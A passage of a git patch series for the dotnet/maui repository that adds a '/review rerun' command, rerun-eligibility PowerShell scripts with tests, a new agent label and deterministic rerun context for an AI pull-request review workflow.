[string]::IsNullOrWhiteSpace($LatestReviewedSha)) { + return $false + } + + return -not $CurrentHeadSha.ToLowerInvariant().StartsWith($LatestReviewedSha.ToLowerInvariant()) +} + +function ConvertTo-RerunActivityItem { + param( + [Parameter(Mandatory = $true)]$Item, + [Parameter(Mandatory = $true)][string]$Kind + ) + + $createdAt = $Item.created_at + if ($Kind -eq 'review') { + $createdAt = $Item.submitted_at + } + + $updatedAt = $Item.updated_at + if ($null -eq $updatedAt) { + $updatedAt = $createdAt + } + + return [pscustomobject]@{ + id = [Int64]$Item.id + kind = $Kind + body = [string]$Item.body + created_at = $createdAt + updated_at = $updatedAt + user = $Item.user + } +} + +function Resolve-RerunEligibility { + param( + [object[]]$Comments, + [object[]]$Commits, + [Parameter(Mandatory = $true)][Int64]$CurrentCommentId, + [string]$CurrentHeadSha, + [object[]]$CurrentLabels = @() + ) + + $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) + if (-not $current) { + return [pscustomobject]@{ Eligible = $false; Reason = 'current-comment-not-found'; Label = $ReadyForRerunLabel } + } + + if (-not (Test-RerunCommand $current.body)) { + return [pscustomobject]@{ Eligible = $false; Reason = 'not-rerun-command'; Label = $ReadyForRerunLabel } + } + + if ($current.user -and ($current.user.type -eq 'Bot' -or $current.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$')) { + return [pscustomobject]@{ Eligible = $false; Reason = 'bot-comment'; Label = $ReadyForRerunLabel } + } + + $latestSummary = Get-LatestAISummaryComment -Comments $Comments + if (-not $latestSummary) { + return [pscustomobject]@{ Eligible = $false; Reason = 'no-ai-summary'; Label = $ReadyForRerunLabel } + } + + if (@($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0) { + return [pscustomobject]@{ Eligible = $true; Reason = 'label-already-present'; Label = $ReadyForRerunLabel } + } + + $summaryUpdatedAt = Get-ObjectDate $latestSummary 'updated_at' + $latestReviewedSha = Get-LatestReviewedSha -AISummaryBody $latestSummary.body + $previousRerun = Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId $CurrentCommentId + $checkpoint = $summaryUpdatedAt + $checkpointReason = 'ai-summary' + if ($previousRerun) { + $previousRerunCreatedAt = Get-ObjectDate $previousRerun 'created_at' + if ($previousRerunCreatedAt -gt $checkpoint) { + $checkpoint = $previousRerunCreatedAt + $checkpointReason = 'previous-rerun' + } + } + + if ($checkpointReason -eq 'ai-summary' -and (Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha)) { + return [pscustomobject]@{ Eligible = $true; Reason = 'new-head-commit'; Label = $ReadyForRerunLabel } + } + + if (Test-HasEvidenceCommentAfter -Comments $Comments -Checkpoint $checkpoint -CurrentCommentId $CurrentCommentId) { + $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-comment-after-previous-rerun' } else { 'new-comment-after-ai-summary' } + return [pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } + } + + if (Test-HasCommitAfter -Commits $Commits -Checkpoint $checkpoint) { + $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-commit-after-previous-rerun' } else { 'new-commit-after-ai-summary' } + return [pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } + } + + return [pscustomobject]@{ Eligible = $false; Reason = 'no-new-comments-or-commits'; Label = $ReadyForRerunLabel } +} + +if ($MyInvocation.InvocationName -eq '.') { + return +} + +$issueComments = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'issue-comment' }) +$reviews = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/reviews?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review' }) +$reviewComments = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review-comment' }) +$comments = @($issueComments + $reviews + $reviewComments) +$pr = gh api "repos/$Owner/$Repo/pulls/$PRNumber" | ConvertFrom-Json +$commits = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/commits?per_page=100" --paginate --jq '.[]' | ForEach-Object { $_ | ConvertFrom-Json }) +$labels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) + +if ($pr.state -ne 'open') { + throw "PR #$PRNumber is not open (state: $($pr.state))" +} + +$result = Resolve-RerunEligibility ` + -Comments $comments ` + -Commits $commits ` + -CurrentCommentId $CurrentCommentId ` + -CurrentHeadSha $pr.head.sha ` + -CurrentLabels $labels + +Write-Host "Rerun eligibility: $($result.Eligible) ($($result.Reason))" + +if ($env:GITHUB_OUTPUT) { + "eligible=$($result.Eligible.ToString().ToLowerInvariant())" >> $env:GITHUB_OUTPUT + "reason=$($result.Reason)" >> $env:GITHUB_OUTPUT + "label=$($result.Label)" >> $env:GITHUB_OUTPUT +} + +if ($ApplyLabel -and $result.Eligible) { + . "$PSScriptRoot/shared/Update-AgentLabels.ps1" + Ensure-LabelExists ` + -LabelName $ReadyForRerunLabel ` + -Description $ReadyForRerunLabelDescription ` + -Color $ReadyForRerunLabelColor ` + -Owner $Owner ` + -Repo $Repo + + $alreadyPresent = @($labels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 + if ($alreadyPresent) { + Write-Host " ✅ Already present: $ReadyForRerunLabel" -ForegroundColor Green + } else { + if (Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo) { + Write-Host " ✅ Applied: $ReadyForRerunLabel" -ForegroundColor Green + } else { + throw "Failed to apply label: $ReadyForRerunLabel" + } + } +} diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 1caa3190d53a..357b9f1329b2 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -593,6 +593,7 @@ if ($existingRaw) { $authorPing = "" if ($prAuthor) { $authorPing = "> @$prAuthor — new AI review results are available based on this last commit: $commitSha7.`n> **$commitTitle**" + $authorPing += ' To request a deterministic rerun after new comments or commits, comment `/review rerun`.' } $reviewStatus = switch ($reviewEvent) { diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index 7c2cd59c1d15..5672aee00747 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -37,6 +37,7 @@ $script:SignalLabels = @{ $script:ManualLabels = @{ 's/agent-fix-implemented' = @{ Description = 'PR author implemented the agent suggested fix'; Color = '7B1FA2' } + 's/agent-ready-for-rerun' = @{ Description = 'AI review has new PR activity and is ready for rerun'; Color = '5319E7' } } $script:TrackingLabel = @{ diff --git a/.github/workflows/review-trigger.yml b/.github/workflows/review-trigger.yml index be5417181a81..eabebeaad97d 100644 --- a/.github/workflows/review-trigger.yml +++ b/.github/workflows/review-trigger.yml @@ -38,6 +38,7 @@ jobs: timeout-minutes: 2 outputs: matched: ${{ steps.check.outputs.matched }} + command: ${{ steps.check.outputs.command }} steps: - name: Match /review command id: check @@ -46,19 +47,72 @@ jobs: run: | if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then echo "matched=true" >> "$GITHUB_OUTPUT" + echo "command=review" >> "$GITHUB_OUTPUT" + exit 0 + fi + TRIMMED_BODY=$(printf '%s' "${COMMENT_BODY}" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//') + if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun$ ]]; then + echo "matched=true" >> "$GITHUB_OUTPUT" + echo "command=rerun" >> "$GITHUB_OUTPUT" + exit 0 + fi + if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun([[:space:]]|$) ]]; then + echo "matched=false" >> "$GITHUB_OUTPUT" + echo "command=none" >> "$GITHUB_OUTPUT" exit 0 fi # Match `/review` as the first non-whitespace token, optionally followed by args. # Allows arbitrary leading whitespace (spaces, tabs, newlines). if [[ "${COMMENT_BODY}" =~ ^[[:space:]]*/review([[:space:]]|$) ]]; then echo "matched=true" >> "$GITHUB_OUTPUT" + echo "command=review" >> "$GITHUB_OUTPUT" else echo "matched=false" >> "$GITHUB_OUTPUT" + echo "command=none" >> "$GITHUB_OUTPUT" fi + mark-rerun-ready: + needs: match + if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'rerun' + runs-on: ubuntu-latest + concurrency: + group: review-rerun-${{ github.event.issue.number }} + cancel-in-progress: false + timeout-minutes: 5 + permissions: + contents: read + issues: write + pull-requests: read + steps: + - name: Checkout repository scripts + uses: actions/checkout@v4 + with: + persist-credentials: false + + - name: Determine rerun eligibility and apply label + id: rerun + env: + GH_TOKEN: ${{ github.token }} + shell: pwsh + run: | + .github/scripts/Resolve-RerunEligibility.ps1 ` + -Owner '${{ github.repository_owner }}' ` + -Repo '${{ github.event.repository.name }}' ` + -PRNumber ${{ github.event.issue.number }} ` + -CurrentCommentId ${{ github.event.comment.id }} ` + -ApplyLabel + + - name: Summarize rerun decision + shell: pwsh + run: | + "### /review rerun" >> $env:GITHUB_STEP_SUMMARY + "Eligible: ${{ steps.rerun.outputs.eligible }}" >> $env:GITHUB_STEP_SUMMARY + "Reason: ${{ steps.rerun.outputs.reason }}" >> $env:GITHUB_STEP_SUMMARY + "Label: ${{ steps.rerun.outputs.label }}" >> $env:GITHUB_STEP_SUMMARY + trigger-review: needs: match - if: needs.match.outputs.matched == 'true' + if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'review' runs-on: ubuntu-latest concurrency: group: review-trigger-${{ github.event.issue.number || inputs.pr_number }} From 19812a027c28b5ef9eedf00585433b88d9ecc130 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:32:02 +0200 Subject: [PATCH 23/34] Verify rerun label application Treat label application as successful when the ready-for-rerun label is present after the GitHub API call, avoiding false failures from brittle gh exit-code handling. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Resolve-RerunEligibility.ps1 | 5 ++++- .github/scripts/shared/Update-AgentLabels.ps1 | 8 ++++---- 2 files changed, 8 insertions(+), 5 deletions(-) diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 index 72eca378f866..1497c6b47075 100644 --- a/.github/scripts/Resolve-RerunEligibility.ps1 +++ b/.github/scripts/Resolve-RerunEligibility.ps1 @@ -304,7 +304,10 @@ if ($ApplyLabel -and $result.Eligible) { if ($alreadyPresent) { Write-Host " ✅ Already present: $ReadyForRerunLabel" -ForegroundColor Green } else { - if (Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo) { + $addSucceeded = Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo + $updatedLabels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) + $labelIsPresent = @($updatedLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 + if ($addSucceeded -or $labelIsPresent) { Write-Host " ✅ Applied: $ReadyForRerunLabel" -ForegroundColor Green } else { throw "Failed to apply label: $ReadyForRerunLabel" diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index 5672aee00747..465d196371cc 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -127,9 +127,9 @@ function Add-Label { [string]$Repo = 'maui' ) - gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` + & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` --method POST ` - -f "labels[]=$LabelName" 2>$null | Out-Null + -f "labels[]=$LabelName" 1>$null 2>$null return $LASTEXITCODE -eq 0 } @@ -144,8 +144,8 @@ function Remove-Label { [string]$Repo = 'maui' ) - gh api "repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` - --method DELETE 2>$null | Out-Null + & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` + --method DELETE 1>$null 2>$null return $LASTEXITCODE -eq 0 } From 87c03f033f9e66681e3dc293f878afc99bbeaa81 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:34:20 +0200 Subject: [PATCH 24/34] Use JSON when adding agent labels Post label additions with the GitHub Issues API JSON payload shape so /review rerun can reliably apply s/agent-ready-for-rerun from GitHub Actions. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/shared/Update-AgentLabels.ps1 | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index 465d196371cc..e963e956c63c 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -127,10 +127,19 @@ function Add-Label { [string]$Repo = 'maui' ) - & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` - --method POST ` - -f "labels[]=$LabelName" 1>$null 2>$null - return $LASTEXITCODE -eq 0 + $tmp = $null + try { + $tmp = New-TemporaryFile + @{ labels = @($LabelName) } | ConvertTo-Json -Compress | Set-Content -LiteralPath $tmp -Encoding utf8 -NoNewline + & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` + --method POST ` + --input $tmp 1>$null 2>$null + return $LASTEXITCODE -eq 0 + } finally { + if ($tmp) { + Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + } + } } # ============================================================ From 4148e723a192685ad77d869987d9dc48c0c92058 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 21:36:28 +0200 Subject: [PATCH 25/34] Allow rerun workflow to label PRs Grant pull-requests: write to the /review rerun labeling job so it can apply s/agent-ready-for-rerun to pull requests after deterministic eligibility passes. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/workflows/review-trigger.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/review-trigger.yml b/.github/workflows/review-trigger.yml index eabebeaad97d..c81111252c4f 100644 --- a/.github/workflows/review-trigger.yml +++ b/.github/workflows/review-trigger.yml @@ -82,7 +82,7 @@ jobs: permissions: contents: read issues: write - pull-requests: read + pull-requests: write steps: - name: Checkout repository scripts uses: actions/checkout@v4 From 84421cfb61bb5ff925ddfb7f62ddea171fec2dfe Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 23:24:26 +0200 Subject: [PATCH 26/34] Remove PR finalization from AI review flow Stop preserving PR finalization sections in MauiBot AI Summary updates and update docs so pr-finalize is no longer described as part of the automated Review-PR process. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/docs/agent-labels.md | 5 ++--- .github/scripts/post-ai-summary-comment.ps1 | 13 +------------ .github/skills/pr-finalize/SKILL.md | 4 ++-- 3 files changed, 5 insertions(+), 17 deletions(-) diff --git a/.github/docs/agent-labels.md b/.github/docs/agent-labels.md index 13f5be605ed8..5793264ec9a9 100644 --- a/.github/docs/agent-labels.md +++ b/.github/docs/agent-labels.md @@ -63,9 +63,8 @@ Review-PR.ps1 │ ├── Validate → writes content.md │ ├── Fix → writes content.md │ └── Report → writes content.md -├── Phase 2: PR Finalize (optional) -├── Phase 3: Post Comments (optional) -└── Phase 4: Apply Labels ← labels are applied here +├── Phase 2: Post Comments (optional) +└── Phase 3: Apply Labels ← labels are applied here ├── Parse content.md files ├── Determine outcome + signal labels ├── Apply via GitHub REST API diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 357b9f1329b2..f49bed0248b0 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -609,17 +609,6 @@ $statusChipRow = New-StatusChipRow ` -Platform (Get-PlatformStatus -Contents $summaryContent) $futureActionSection = New-FutureActionSection -PRAgentDir $PRAgentDir -$finalizeSection = "" -$finalizePattern = '(?s)(.*?)' -if ($existingBodies -and $existingBodies.Count -gt 0) { - for ($i = $existingBodies.Count - 1; $i -ge 0; $i--) { - if ($existingBodies[$i] -match $finalizePattern) { - $finalizeSection = "`n`n" + $Matches[1] - break - } - } -} - $commentBody = @" $MARKER @@ -631,7 +620,7 @@ $statusChipRow $newSessionBlock -$futureActionSection$finalizeSection +$futureActionSection "@ # Clean up excessive blank lines diff --git a/.github/skills/pr-finalize/SKILL.md b/.github/skills/pr-finalize/SKILL.md index 9932ac6534c5..3dc0d6ec33a2 100644 --- a/.github/skills/pr-finalize/SKILL.md +++ b/.github/skills/pr-finalize/SKILL.md @@ -39,7 +39,7 @@ Ensures PR title and description accurately reflect the implementation, and perf **Correct workflow:** 1. **This skill**: Analyze PR, produce findings and write to `pr-finalize-summary.md` -2. **Review-PR.ps1** calls `post-pr-finalize-comment.ps1` to post the summary +2. **Human-controlled follow-up**: PR finalization is not part of the automated `Review-PR.ps1` flow. Only post or use the summary when a user explicitly asks for PR finalization. **Only humans control when comments are posted.** Your job is to analyze and present findings. @@ -366,7 +366,7 @@ gh pr diff XXXXX -- path/to/file.cs **Workflow:** 1. **This skill**: Analyze PR, produce findings and write to `pr-finalize-summary.md` -2. **Review-PR.ps1** calls `post-pr-finalize-comment.ps1` to post the summary +2. **Human-controlled follow-up**: PR finalization is not part of the automated `Review-PR.ps1` flow. Only post or use the summary when a user explicitly asks for PR finalization. The user controls when comments are posted. Your job is to analyze and present findings. From f1d8b1c86ba8de20fdc643da71ae126e3e4c547e Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 13:56:01 +0200 Subject: [PATCH 27/34] Include rerun activity in pre-flight context Generate a deterministic rerun context artifact listing new comments and commits since the latest AI Summary or previous /review rerun checkpoint, and instruct pre-flight to read it before reviewing. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Resolve-RerunEligibility.Tests.ps1 | 21 ++ .github/scripts/Resolve-RerunEligibility.ps1 | 180 +++++++++++++++++- .github/scripts/Review-PR.ps1 | 30 +++ 3 files changed, 229 insertions(+), 2 deletions(-) diff --git a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 index 35911de8ac4e..e5ca621a5b15 100644 --- a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 +++ b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 @@ -208,4 +208,25 @@ Describe 'Resolve-RerunEligibility' { $result.Eligible | Should -BeTrue $result.Reason | Should -Be 'label-already-present' } + + It 'builds deterministic rerun context with new comments and commits' { + $comments = @( + New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' + New-TestComment -Id 2 -Body 'New author context.' -CreatedAt '2026-05-31T09:45:00Z' + New-TestComment -Id 3 -Body '/review rerun' -CreatedAt '2026-05-31T09:50:00Z' + ) + $commits = @( + New-TestCommit -Sha 'fedcba9876543210' -Date '2026-05-31T09:48:00Z' + ) + + $context = New-RerunContextMarkdown -Comments $comments -Commits $commits -CurrentHeadSha 'fedcba9876543210' + + $context | Should -Match '# Rerun Context' + $context | Should -Match 'New non-command comments: 1' + $context | Should -Match 'New commits: 1' + $context | Should -Match '`s/agent-ready-for-rerun` present: false' + $context | Should -Match 'New author context' + $context | Should -Match 'fedcba9' + $context | Should -Not -Match '\| .*\/review rerun' + } } diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 index 1497c6b47075..d388cd65cde1 100644 --- a/.github/scripts/Resolve-RerunEligibility.ps1 +++ b/.github/scripts/Resolve-RerunEligibility.ps1 @@ -14,12 +14,13 @@ param( [Parameter(Mandatory = $true)] [int]$PRNumber, - [Parameter(Mandatory = $true)] - [Int64]$CurrentCommentId, + [Int64]$CurrentCommentId = 0, [string]$Owner = 'dotnet', [string]$Repo = 'maui', + [string]$ContextOutputPath, + [switch]$ApplyLabel ) @@ -92,6 +93,15 @@ function Get-LatestRerunCommentBefore { Select-Object -First 1) } +function Get-LatestRerunComment { + param([object[]]$Comments) + + return @($Comments | + Where-Object { Test-RerunCommand $_.body } | + Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | + Select-Object -First 1) +} + function Get-LatestReviewedSha { param([string]$AISummaryBody) @@ -160,6 +170,18 @@ function Test-HasCommitAfter { } | Select-Object -First 1) } +function Get-CommitDate { + param($Commit) + + if ($Commit.commit -and $Commit.commit.committer -and $Commit.commit.committer.date) { + return ConvertTo-DateTimeOffset $Commit.commit.committer.date + } + if ($Commit.commit -and $Commit.commit.author -and $Commit.commit.author.date) { + return ConvertTo-DateTimeOffset $Commit.commit.author.date + } + return $null +} + function Test-HeadDiffersFromReviewedSha { param( [string]$CurrentHeadSha, @@ -199,6 +221,136 @@ function ConvertTo-RerunActivityItem { } } +function Format-MarkdownCell { + param([string]$Value) + + if ([string]::IsNullOrWhiteSpace($Value)) { + return '' + } + + $singleLine = ($Value -replace '\r?\n', ' ').Trim() + if ($singleLine.Length -gt 180) { + $singleLine = $singleLine.Substring(0, 177) + '...' + } + + return ($singleLine -replace '\|', '\|') +} + +function New-RerunContextMarkdown { + param( + [object[]]$Comments, + [object[]]$Commits, + [string]$CurrentHeadSha, + [object[]]$CurrentLabels = @() + ) + + $latestSummary = Get-LatestAISummaryComment -Comments $Comments + $latestRerun = Get-LatestRerunComment -Comments $Comments + $checkpointRerun = if ($latestRerun) { Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId ([Int64]$latestRerun.id) } else { $null } + $readyLabelPresent = @($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 + + $latestReviewedSha = if ($latestSummary) { Get-LatestReviewedSha -AISummaryBody $latestSummary.body } else { $null } + $summaryUpdatedAt = if ($latestSummary) { Get-ObjectDate $latestSummary 'updated_at' } else { $null } + + $checkpoint = $summaryUpdatedAt + $checkpointReason = if ($latestSummary) { 'latest AI Summary' } else { 'none' } + if ($checkpointRerun) { + $checkpointRerunCreatedAt = Get-ObjectDate $checkpointRerun 'created_at' + if (-not $checkpoint -or $checkpointRerunCreatedAt -gt $checkpoint) { + $checkpoint = $checkpointRerunCreatedAt + $checkpointReason = 'previous /review rerun' + } + } + + $evidenceComments = @() + if ($checkpoint) { + $evidenceComments = @($Comments | Where-Object { + (Test-CommentIsEvidence -Comment $_ -CurrentCommentId 0) -and + (Get-ObjectDate $_ 'created_at') -gt $checkpoint + } | Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $false }, @{ Expression = { [Int64]$_.id }; Descending = $false }) + } + + $newCommits = @() + if ($checkpoint) { + $newCommits = @($Commits | Where-Object { + $date = Get-CommitDate $_ + $date -and $date -gt $checkpoint + } | Sort-Object @{ Expression = { Get-CommitDate $_ }; Descending = $false }) + } + + $headDiffers = Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha + $lines = [System.Collections.Generic.List[string]]::new() + $lines.Add('# Rerun Context') + $lines.Add('') + $lines.Add('This file was generated deterministically before pre-flight. No AI was used to decide or summarize this context.') + $lines.Add('') + $lines.Add('## Checkpoint') + $lines.Add('') + if ($latestSummary) { + $lines.Add("- Latest AI Summary: $($latestSummary.kind) `#$($latestSummary.id)` updated $($summaryUpdatedAt.ToString('u'))") + } else { + $lines.Add('- Latest AI Summary: not found') + } + if ($latestRerun) { + $lines.Add("- Latest `/review rerun`: comment `#$($latestRerun.id)` created $((Get-ObjectDate $latestRerun 'created_at').ToString('u'))") + } else { + $lines.Add('- Latest `/review rerun`: not found') + } + if ($checkpointRerun) { + $lines.Add("- Previous `/review rerun` checkpoint: comment `#$($checkpointRerun.id)` created $((Get-ObjectDate $checkpointRerun 'created_at').ToString('u'))") + } + if ($checkpoint) { + $lines.Add("- Activity checkpoint: $checkpointReason at $($checkpoint.ToString('u'))") + } else { + $lines.Add('- Activity checkpoint: none') + } + $lines.Add("- Latest reviewed SHA: $(if ($latestReviewedSha) { $latestReviewedSha } else { 'unknown' })") + $lines.Add("- Current head SHA: $(if ($CurrentHeadSha) { $CurrentHeadSha } else { 'unknown' })") + $lines.Add("- Current head differs from latest reviewed SHA: $($headDiffers.ToString().ToLowerInvariant())") + $lines.Add("- ``$ReadyForRerunLabel`` present: $($readyLabelPresent.ToString().ToLowerInvariant())") + $lines.Add('') + $lines.Add('## New activity since checkpoint') + $lines.Add('') + $lines.Add("- New non-command comments: $($evidenceComments.Count)") + $lines.Add("- New commits: $($newCommits.Count)") + $lines.Add('') + + if ($evidenceComments.Count -gt 0) { + $lines.Add('### New comments') + $lines.Add('') + $lines.Add('| Kind | Author | Created | Body |') + $lines.Add('|---|---|---|---|') + foreach ($comment in $evidenceComments) { + $author = if ($comment.user) { [string]$comment.user.login } else { '' } + $createdAt = (Get-ObjectDate $comment 'created_at').ToString('u') + $lines.Add("| $($comment.kind) | $(Format-MarkdownCell $author) | $createdAt | $(Format-MarkdownCell $comment.body) |") + } + $lines.Add('') + } + + if ($newCommits.Count -gt 0) { + $lines.Add('### New commits') + $lines.Add('') + $lines.Add('| SHA | Author | Date | Message |') + $lines.Add('|---|---|---|---|') + foreach ($commit in $newCommits) { + $sha = if ($commit.sha) { ([string]$commit.sha).Substring(0, [Math]::Min(7, ([string]$commit.sha).Length)) } else { '' } + $author = if ($commit.commit -and $commit.commit.author) { [string]$commit.commit.author.name } else { '' } + $date = Get-CommitDate $commit + $message = if ($commit.commit -and $commit.commit.message) { ([string]$commit.commit.message -split "`n")[0] } else { '' } + $lines.Add("| $sha | $(Format-MarkdownCell $author) | $(if ($date) { $date.ToString('u') } else { '' }) | $(Format-MarkdownCell $message) |") + } + $lines.Add('') + } + + if ($evidenceComments.Count -eq 0 -and $newCommits.Count -eq 0 -and -not $headDiffers) { + $lines.Add('No new deterministic activity was found since the checkpoint.') + $lines.Add('') + } + + return ($lines -join "`n") +} + function Resolve-RerunEligibility { param( [object[]]$Comments, @@ -276,6 +428,30 @@ if ($pr.state -ne 'open') { throw "PR #$PRNumber is not open (state: $($pr.state))" } +if ($ContextOutputPath) { + $context = New-RerunContextMarkdown ` + -Comments $comments ` + -Commits $commits ` + -CurrentHeadSha $pr.head.sha ` + -CurrentLabels $labels + $contextDir = Split-Path -Parent $ContextOutputPath + if ($contextDir) { + New-Item -ItemType Directory -Force -Path $contextDir | Out-Null + } + $context | Set-Content -LiteralPath $ContextOutputPath -Encoding UTF8 + Write-Host "Wrote rerun context: $ContextOutputPath" + if ($env:GITHUB_OUTPUT) { + "context_output_path=$ContextOutputPath" >> $env:GITHUB_OUTPUT + } + if ($CurrentCommentId -eq 0 -and -not $ApplyLabel) { + exit 0 + } +} + +if ($CurrentCommentId -eq 0) { + throw "CurrentCommentId is required unless only writing ContextOutputPath." +} + $result = Resolve-RerunEligibility ` -Comments $comments ` -Commits $commits ` diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 575dff836e2b..377b11e720d4 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1355,6 +1355,35 @@ $gateStatusForPrompt = switch ($gateResult) { default { "Gate ❌ FAILED — tests did NOT behave as expected." } } +$rerunContextInstruction = "" +$rerunContextPath = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md" +$rerunContextScript = Join-Path $ScriptsDir "Resolve-RerunEligibility.ps1" +if (Test-Path $rerunContextScript) { + try { + Write-Host "Generating deterministic rerun context..." -ForegroundColor Cyan + & pwsh -NoProfile -File $rerunContextScript ` + -PRNumber $PRNumber ` + -Owner 'dotnet' ` + -Repo 'maui' ` + -ContextOutputPath $rerunContextPath + if ($LASTEXITCODE -eq 0 -and (Test-Path $rerunContextPath)) { + Write-Host " ✅ rerun context: $rerunContextPath" -ForegroundColor Green + $rerunContextInstruction = @" + +## Deterministic rerun context + +Before pre-flight, read ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md`` if it exists. This file is generated without AI and lists new comments/commits since the latest AI Summary or previous ``/review rerun`` checkpoint. + +When the file has new activity, explicitly include a "New activity since previous AI Summary" subsection in ``pre-flight/content.md`` and prioritize that delta when deciding what changed since the previous review. +"@ + } else { + Write-Host " ⚠️ rerun context generation exited with code $LASTEXITCODE" -ForegroundColor Yellow + } + } catch { + Write-Host " ⚠️ rerun context generation failed: $_" -ForegroundColor Yellow + } +} + # Build regression test instruction for try-fix candidates $regressionTestInstruction = "" if ($risksData -and $regressionTests -and $regressionTests.Count -gt 0) { @@ -1388,6 +1417,7 @@ Generate alternative fix candidates for PR #$PRNumber using an iterative expert- ## Phase 1 — Pre-Flight (context only) Use the pr-review skill's pre-flight phase to gather context about the issue and PR. Do NOT 